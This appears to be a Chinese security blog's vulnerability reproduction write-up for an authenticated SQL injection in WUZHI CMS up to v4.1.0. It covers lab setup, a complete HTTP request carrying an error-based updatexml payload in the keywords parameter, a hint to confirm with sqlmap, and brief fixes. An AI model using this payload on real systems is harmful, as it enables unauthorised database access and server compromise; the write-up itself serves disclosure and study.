声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!
0x01 产品简介
WUZHI CMS是北京五指互联科技有限公司的一套基于PHP和MySQL的开源内容管理系统,响应式布局,一个网站兼容多个终端 × 微信接口全支持,快速构建微营销平台 × 开放接口,支持第三方APP无缝接入。
0x02 漏洞概述
五指CMS的/core/admin/copyfrom.php $keywords参数存在SQL注入漏洞,经过身份验证的攻击者可通过该漏洞获取数据库中的信息之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
0x03 影响范围
Wuzhicms <= v4.1.0
0x04 复现环境搭建
phpstudy集成环境
Nginx(1.15.11) + MySQL(5.7.26) + php(7.2.4nts)
WuZhiCMS V4.1.0
安装包:https://github.com/wangshunde/wuzhicms
打不开开加速器,作者是开的游戏加速器加速Github站
访问以下路径进行安装,并且提前搭建好数据库。
http://{ip/host}/www/install/index.php
0x05漏洞复现
需要进行登录认证
漏洞URL路径
/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms
漏洞POC
GET /www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=&_submenuid=&keywords=1'+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+ HTTP/1.1
Host: 192.168.5.146
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.5.146/www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=8e1iv8mhg3peefbamikj5hgg9g; oAf_siteid=2b92gtq6hC8N7wWn7RPdtdsUSWN12n21gtiXENTt
Connection: close
对于初学者来说Poc是什么,poc就是概念验证,就是验证是否存在的东西。你们搜索抓包过后 在第一行的末尾加上
'+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+
SQLmap补充验证
文本是Get包
0x06 漏洞修复
官方暂时未发布最新补丁,请注意官网最新消息。
或者添加Waf,以及关键字过滤。
https://www.wuzhicms.com/
小编提示:未经授权的渗透测试属于违法行为!!!!